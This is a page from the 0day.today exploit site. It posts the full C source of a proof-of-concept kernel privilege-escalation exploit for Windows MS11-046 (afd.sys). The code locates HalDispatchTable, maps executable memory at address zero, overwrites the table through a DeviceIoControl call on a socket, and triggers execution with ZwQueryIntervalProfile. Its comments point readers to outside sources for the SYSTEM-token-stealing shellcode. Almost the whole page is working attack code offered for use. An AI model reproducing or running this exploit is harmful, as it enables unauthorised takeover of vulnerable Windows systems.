0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MS11-046 Afd.sys Proof of Concept
[/*
MS11-046 Was a Zero day found in the wild , reported to MS by
Steven Adair from the Shadowserver Foundation and Chris S .
Ronnie Johndas wrote the writeup dissecting a malware with this exploit .
I Rahul Sasi(fb1h2s) just made the POC exploit available .
Reference: ms8-66, ms6-49
*************************************************************
Too lazy to add the shellcode , you could steel this one, it should work .
http://www.whitecell.org/list.php?id=50
The shell code to acheive privilage esclation as per the article used the following steps
http://www.exploit-db.com/wp-content/themes/exploit/docs/18712.pdf
.
1) Use PslookupProcessId get system token
2) Replace it with the current process token, and we are system
*************************************************************
*/
#define SystemModuleInformation 11
#ifndef WIN32_LEAN_AND_MEAN
#define WIN32_LEAN_AND_MEAN
#endif
#ifndef _WIN32_WINNT
//For XP Only
#define _WIN32_WINNT 0x0501
#endif
// We have a client sock conencting to 135 considering the fact it's open by default
#define DEFAULT_ADDR "127.0.0.1"
#define DEFAULT_PORT "135"
#include <windows.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <stdio.h>
#include <iphlpapi.h>
#include <stdio.h>
#pragma comment(lib, "Ws2_32.lib")
#pragma comment (lib, "ntdll.lib")
//lets make a nop ret sandwitch
unsigned char hexcode[]="\x90\x90\x90\xcc\x90\x90\x90\x90";
/*
The shell code to acheive privilage esclation
Add you shellcode here as per the article http://www.exploit-db.com/wp-content/themes/exploit/docs/18712.pdf
the malware used the following method.
1) Wse PslookupProcessId get system token
2) Replace it with the current process token, and we are system
*/
// he gets the above sandwitch
LPVOID hexcode_addr = (LPVOID)0x00000000;
DWORD sizeofshell = 0x1000;
// he gets the haldispatch
ULONG_PTR HalDispatchTable;
//Holds the base adress of krnl
PVOID krl_base;
//load adress of those %krnl%.exe dudes
HMODULE krl_addr;
// structure system_module_info data
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Reserved[2];
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT Unknown;
USHORT LoadCount;
USHORT ModuleNameOffset;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
//sock addrinfo
struct addrinfo *result = NULL,
*ptr = NULL,
hints;
// The list of loaded drivers
typedef LONG NTSTATUS, *PNTSTATUS;
NTSTATUS
NTAPI
ZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);
typedef enum _KPROFILE_SOURCE {
ProfileTime,
ProfileAlignmentFixup,
ProfileTotalIssues,
ProfilePipelineDry,
ProfileLoadInstructions,
ProfilePipelineFrozen,
ProfileBranchInstructions,
ProfileTotalNonissues,
ProfileDcacheMisses,
ProfileIcacheMisses,
ProfileCacheMisses,
ProfileBranchMispredictions,
ProfileStoreInstructions,
ProfileFpInstructions,
ProfileIntegerInstructions,
Profile2Issue,
Profile3Issue,
Profile4Issue,
ProfileSpecialInstructions,
ProfileTotalCycles,
ProfileIcacheIssues,
ProfileDcacheAccesses,
ProfileMemoryBarrierCycles,
ProfileLoadLinkedIssues,
ProfileMaximum
} KPROFILE_SOURCE, *PKPROFILE_SOURCE;
typedef DWORD (WINAPI *PNTQUERYINTERVAL)( KPROFILE_SOURCE ProfileSource,PULONG Interval );
typedef NTSTATUS (WINAPI *PNTALLOCATE)( IN HANDLE ProcessHandle,
IN OUT PVOID *BaseAddress,
IN ULONG ZeroBits,
IN OUT PULONG RegionSize,
IN ULONG AllocationType,
IN ULONG Protect );
int main() {
//All the declarations goes here
PNTQUERYINTERVAL ZwQueryIntervalProfile;
PNTALLOCATE ZwAllocateVirtualMemory;
KPROFILE_SOURCE stProfile = ProfileTotalIssues;
ULONG Ret_size;
NTSTATUS status,alloc_status ;
ULONG i, n, *q;
PSYSTEM_MODULE_INFORMATION p;
void *base;
WSADATA wsaData;
SOCKET ConnectSocket = INVALID_SOCKET;
int iResult;
DWORD ibuf [0x30];
DWORD obuf [0x30];
ULONG_PTR result;
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
hints.ai_protocol = IPPROTO_TCP;
printf("\n [+] MS11-046 Exploit by fb1h2s(Rahul Sasi) ");
/*
MS11-046 Was a Zero day found in the wild , reported to MS by
Steven Adair from the Shadowserver Foundation and Chris S .
Ronnie Johndas wrote the writeup dissecting a malware with the exploit details .
I Rahul Sasi(fb1h2s) just made the POC exploit available .
Reference: ms8_66, ms6_49 http://www.whitecell.org/list.php?id=50 exp codes
*/
status = ZwQuerySystemInformation(SystemModuleInformation, &n, 0, &n);
q = (ULONG *)malloc(n * sizeof(*q));
if (q == NULL) {
perror("malloc");
return -1;
}
status = ZwQuerySystemInformation(SystemModuleInformation, q, n * sizeof(*q), NULL);
p = (PSYSTEM_MODULE_INFORMATION)(q + 1);
base = NULL;
// Loop Loop The table and check for our krl
for (i = 0; i < *q; i++)
{
if( strstr(p[i].ImageName,"ntkrnlpa.exe") )
{
printf("\n [+] Yo Yo found, and am In ntkrnlpa.exe \n");
krl_addr = LoadLibraryExA("ntkrnlpa.exe",0,1);
printf("\t Base: 0x%x size: %u\t%s\n",
p[i].Base,
p[i].Size,
p[i].ImageName);
krl_base = p[i].Base;
break;
}
else if(strstr(p[i].ImageName,"ntoskrnl.exe"))
{
printf("\n [+] Yo Yo found, and am In ntoskrnl.exe\n");
krl_addr = LoadLibraryExA("ntoskrnl.exe",0,1);
printf("\t Base Adress: 0x%x ",p[i].Base);
krl_base = p[i].Base;
break;
}
else
{
printf("\n [+]Cdnt find, and am out\n");
exit(0);
}
}
free(q);
printf("\n[+] Continue with Exploitation\n");
HalDispatchTable = (ULONG_PTR)GetProcAddress(krl_addr,
"HalDispatchTable");
if( !HalDispatchTable )
{
printf("[!!] Sh*t happen with HalDispatchTablen");
return FALSE;
}
printf("\tBase Nt=: 0x%x ",krl_base);
HalDispatchTable -= ( ULONG_PTR )krl_addr;
HalDispatchTable += krl_base;
printf("\n[+] HalDispatchTable found \t\t\t [ 0x%p ]\n",HalDispatchTable);
printf("[+] ZwQueryIntervalProfile ");
ZwQueryIntervalProfile = ( PNTQUERYINTERVAL ) GetProcAddress(GetModuleHandle("ntdll.dll"),
"ZwQueryIntervalProfile");
if( !ZwQueryIntervalProfile )
{
printf("[!!] Sh*t happen resolving ZwQueryIntervalProfile\n");
return FALSE;
}
printf( "\t\t\t [ 0x%p ]\n",ZwQueryIntervalProfile );
printf("[+] ZwAllocateVirtualMemory");
ZwAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandle( "ntdll.dll"),
"ZwAllocateVirtualMemory");
if( !ZwAllocateVirtualMemory )
{
printf("[!!] Unable to resolve ZwAllocateVirtualMemory\n");
return FALSE;
}
printf( "\t\t\t [ 0x%p ]\n",ZwAllocateVirtualMemory );
printf("\n[+] Allocating memory at [ 0x%p ]...\n",hexcode_addr);
alloc_status = ZwAllocateVirtualMemory( INVALID_HANDLE_VALUE,
&hexcode_addr,
0,
&sizeofshell,
MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,
PAGE_EXECUTE_READWRITE );
printf("\n[+] status %p.\n",alloc_status );
if( alloc_status != 0 )
{
printf("[-] Sh*t happen with NtAllocateVirtualMemory() , %#X\n",
alloc_status);
}
printf("\t\tZwAllocateVirtualMemory() Allocated return Status, %#X\n",
alloc_status);
memset(hexcode_addr, 0x90, sizeofshell);
memcpy( (void*)((BYTE*)hexcode_addr + 0x100),(void*)hexcode, sizeof(hexcode));
iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
if (iResult != 0) {
printf("WASUP Failed: %d\n", iResult);
return 1;
}
iResult = getaddrinfo(DEFAULT_ADDR, DEFAULT_PORT, &hints, &result);
ptr=result;
// SOCKET for connecting to localhost at 135
ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype,
ptr->ai_protocol);
if (ConnectSocket == INVALID_SOCKET) {
printf("[-] This is bad , Socket Error : %ld\n", WSAGetLastError());
freeaddrinfo(result);
WSACleanup();
return 1;
}
// Connect to server.
iResult = connect( ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen);
if (iResult == SOCKET_ERROR) {
closesocket(ConnectSocket);
ConnectSocket = INVALID_SOCKET;
printf("[+]Unable to connect to server, modify code and add a server socket, and connect to it!\n");
WSACleanup();
return ;
}
else {
printf("[+]Hola Connected to server !\n");
}
memset(ibuf,0x90,sizeof(ibuf));
memset(obuf,0x90,sizeof(obuf));
DeviceIoControl((HANDLE)ConnectSocket,
0x12007,
(LPVOID)ibuf,sizeof(ibuf),
(LPVOID)obuf,0,
&Ret_size,
NULL);
for( i = 0; i < sizeof( hints ) ; i++)
{
printf(" %02X ",(unsigned char)obuf[i]);
}
printf("\n\n[+] Overwriting HalDispatchTable with those bytes...");
DeviceIoControl((HANDLE)ConnectSocket,
0x12007,
(LPVOID)ibuf,sizeof(ibuf),
(LPVOID)HalDispatchTable,0,
&Ret_size,
NULL);
printf("\n\n[+] This should work and break...");
ZwQueryIntervalProfile(stProfile,&result);
}
# 0day.today [2024-07-02] #